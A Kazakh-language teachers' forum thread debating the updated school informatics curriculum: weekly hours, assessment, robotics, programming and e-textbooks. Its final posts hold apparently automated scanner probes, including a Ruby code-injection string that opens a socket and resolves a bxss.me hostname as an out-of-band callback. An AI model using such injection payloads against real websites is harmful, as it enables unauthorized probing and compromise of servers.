Форум
Информатика
Жарияланған күні: 10.29.2019
Автор
Хабарлама
29.10.2019 10:50:59

Информатика пәні бойынша сізді толғандыратын мәселе қандай?

Автор
Хабарлама
19.12.2019 15:13:47

жалпы мектепте информатика аптасына бір рет болғандықтан күнтізбелік- тақырыптық жоспарлау барысында БЖБ, ТЖБ-ға кітаптың бөлімдері сәйкес келмейді. Оны қалай шешуге болады?

Автор
Хабарлама
15.02.2020 08:31:33
Жаңартылған білім беру бағдарламасы қазіргі заманға сай жасалған. Бұл бағдарламада информатиканың көп бағыттары беріледі. Яғни, бұл бағдарлама балалардың информатика жайындағы білімдерін одан әрі кеңейтуге өз септігіп тигізеді. Бұл дегеніміз қазіргі заманға сай, бәсекеге қабілетті өз ісінің шеберлерін шығаруға мүмкіндік береді.
Автор
Хабарлама
15.02.2020 08:35:29

Қазіргі заман талабына сай адам іс-әрекетінің барлық салаларында еркін қолданысқа енген ақпараттық технологиялар біздің күнделікті өміріміздің ажырамас бөлігі болып табылады. Ақпараттық технологияларды тиімді қолдану сандық үлгіде көрсетілген әртүрлі ақпараттың түрлерімен жұмыс істеу үдерісін тездетеді және жеңілдетеді. Бірақ менің ойымша 1-2 сыныптан бастап информатиканы балаларға өте күрделі болып келеді деп ойлаймын. 1 сыныптан бастап робототехниканы қойғаны жақсы деп ойлаймын. Балаларға роботы құрұрастыру қызықтырақ. Ал 1 сыныптан бастап бағдарламалау, Scratch т.б қйын болып келеді.

Автор
Хабарлама
15.02.2020 08:39:36

Информатикадағы жаңартылған бағдарлама бойынша не ойлаймын?

Жаңартылған бағдарлама менің ойымша қолайсыз. Себебі уақыт саны аз, оқушылар бағдарламаны түсінбейді тек қана белгілі бір мөлшерде оқиды. Мұғалімдердің құжатпен қолдары босамайды. Оқушылардың өздеріне бос уақыттары болмайды. Оқушылардың оқуға деген ынталары төмендеді. Себебі, баға қойылмайды.

Ұсынысым: Сабақ санын арттыру;

Баллмен не болмаса бағамен бағалауды қайтару;

Офистік бағдарламаларға емес робототехника мен бағдарламалауға көп көңіл аудару қажет.

Автор
Хабарлама
15.02.2020 08:40:30
adylhanaru@gmail.ru жауап

Қазіргі заман талабына сай адам іс-әрекетінің б...

Келісемін

Автор
Хабарлама
15.02.2020 08:41:39
tshalkhymanov11@bk.ru жауап

Информатикадағы жаңартылған бағдарл...

Толықтай келсемін

Автор
Хабарлама
15.02.2020 08:48:24

Жаңартылған білім беру мазмұнына көшу сатысы басталып,оқушыларды кең ауқымды дағдыларға үйретуге, функционалдық сауаттылықтарын арттыруға, адами құндылықтарын дамытуға көңіл бөлініп, заманауи технологияларды қолдануға көшу процесінде мұғалімнің кәсіби шеберлігін арттыру туралы. Оқушылардың компьютерлік дағдылар мен құзыреттіліктерді меңгеруі, бір жағынан, уақыт талабы болса, екінші жағынан, бұл талап ақпараттық технологиялардың өзге оқу пәндерін оқытудың тиімді құралы ретінде қолданылады. Мемлекетіміздің білім беру үдерісіне енген жаңартылған білім беру бағдарламасы — заман талабына сай келешек ұрпақтың сұранысын қанағаттандыратын тың бағдарлама.

Автор
Хабарлама
15.02.2020 08:49:32

Жаңартылған бағдарлама-заман талабына сай. Информатика пәнін оқытуда мұғалім балалардың ой – өрісі мен танымдық қабілеттерін дамыту, өз ойын жеткізе білу дағдыларын қалыптастыру мақсатында жаңа технологияларды кеңінен қолданған дұрыс.Осы арқылы білім деңгейі көтеріліп, оқушылардың оқуға деген құлшыныстары арта түседі. Осындай жақсы бағдарлама болашағымыздың жарқын екенін көрсетеді.

Автор
Хабарлама
15.02.2020 08:49:38

Жаңартылған білім беру бағдарламасы баланың жан – жақты ізденуіне ынталандырады. Бүгінгі күні барлық елдер өз оқу бағдарламаларын жанартуда. Өйткені қазіргі замандағы балалардың қызығушылықтары өте жоғары, олар әр түрлі компьютерлік бағдарламаларды тез меңгеріп отыр. Информатика сабақтары жаңартылған бағдарламен өте қызық және сапалы өтеді. Яғни бұл бағдарлама балалардың информатика жайында біілімдерін кеңейтеді.

Автор
Хабарлама
15.02.2020 08:50:48

Жапония, Қытай, Еуропа елдерінде бастауыш сыныптардан бастап программалау, робототехника, информатиканың күрделі салалары оқытылады. Яғни олар оны толық меңгерген. Ал біздің елімізді алатын болсақ, орта буынан бастап оқушылар информатика пәнін оқиды, ал жоғарғы сыныптарға келгенде программалау тілдерін үйренеді. Яғни, жаңартылған білім балалар үшін өте күрделі. Бұл жоспар бойынша тек қана бастауыш сыныптар ғана емес, орта және де жоғарғы сыныптарда да үлкен өзгерістер болады. Бастауыш сыныптардың білімі жаңартылған білім бойынша, жоғарғы және орта буындардан қарағанда тереңірек. Сол үшін оқушылар үшін робототехника және программалау тілдері жеке пән түрінде берілу керек деген ойдамын.

Автор
Хабарлама
15.02.2020 08:50:50

Жалпы жаңартылған бағдарлама бойынша ол біріншіден аптасына бір рет болғандықтан көбінесе сабақты үлгермей жатады. Информатика сабағы бойынша оқушыларға Роботехника , Программалау тілдері, Компьютерлік графика , Scratch бағдарламалары толық түсінуге, үйренуге олармен жұмыс жасағанда уақыт жетпейді. Сондықтан ұсынысым сағаттарды қосуды және аптасына екі рет болуы немесе бір күнде екі рет сабақ болуы деп ойлаймын.

Автор
Хабарлама
15.02.2020 08:54:29

Жаңартылған оқу бағдарламасының мақсаты оқушылардың білім, білік дағдыларын қалыптастырып, өз бетінше білім алуға ұмтылу. Мұғалім тек қана бағыт-бағдар беріп оқушыларды сабақта ынталандыру керек.

Жаңартылған бағдарлама бойынша өзекті мәселелер :

1) Информатиканы оқу барысында меңгерген ойлау және модельдеу дағдыларын әртүрлі өмірлік жағдайларда қолдануға болатынын түсіну;

2) Оқушылар өздерінің білімдерін ұштастыру, мұғалімнің көменгінсіз білімді өздері меңгеру;

3) Бағдарламалау дағдыларын қолдану ағымдағы іс-әрекетті жетілдіре алатынын және жаңа идеялардың пайда болуына мүмкіндік беретін бағдарламалық қосымшалар жасауға септігін тигізетінін терең түсінуіне мүмкіндік береді;

4) Сабақта әр түрлі әдіс-тәсілдерді қолдану;

5)Жүйелер алгоритмдердің және бағдарламалаудың көмегімен модельденетінің түсіну;

Сонымен «Информатика» пәні бойынша оқу бағдарламасындағы оқу мақсаттары оқушылардан өздерінің дағдыларды үйренуі туралы ой-пікірлерін білдіріп, оны талдай және бағалауды білуді талап етеді.

Автор
Хабарлама
15.02.2020 08:57:50

Бағдарлама бойынша ойым: Мақсатты білім беру – тұлға дамуын жүзеге асыратын мәселе. Ал осы жалпыеуропалық стнадартқа сай жаңа білім беру — жеке тұлғаның жан-жақты дамуына әкелетін бірден-бір жол!

Қосымша :" Педагогикалық жұмыстағы шешуші нәрсе- ең жақсы оқыту әдістерән таба білуде". Жаңа бағдарлама ең озық педагогикалық әдістерінің жиынтығы. Әлемдік білім беру үрдісінің ең озық үлгілеріне бағдарланған

Автор
Хабарлама
26.02.2020 16:44:15

Сабақ барысында электронды оқулықты үнемі пайдаланамын, әсіресе видеороликтерді, сонымен қатар жаттығуларын және тест тапсырмаларын. Жаңа сабақты түсіндіруде және бекітуде тамаша көмекші құрал.

Автор
Хабарлама
26.02.2020 18:28:03

Мен үнемі сабағымда пайдаланамын, себебі керемет көмекші құрал.

Автор
Хабарлама
13.03.2020 11:46:33

Bilimland.kz қазіргі кезде заманға сай сабақ үстінде қолдануға өте ыңғайлы. Сабақ барысында видеолар көрсетемін.

Автор
Хабарлама
18.09.2020 14:02:10
1
Автор
Хабарлама
18.09.2020 14:02:11
@@Z88xN
Автор
Хабарлама
18.09.2020 14:02:36
"+"A".concat(70-3).concat(22*4).concat(111).concat(66).concat(120).concat(65)+(require"socket"
Socket.gethostbyname("hitoi"+"ecichezu3511f.bxss.me.")[3].to_s)+"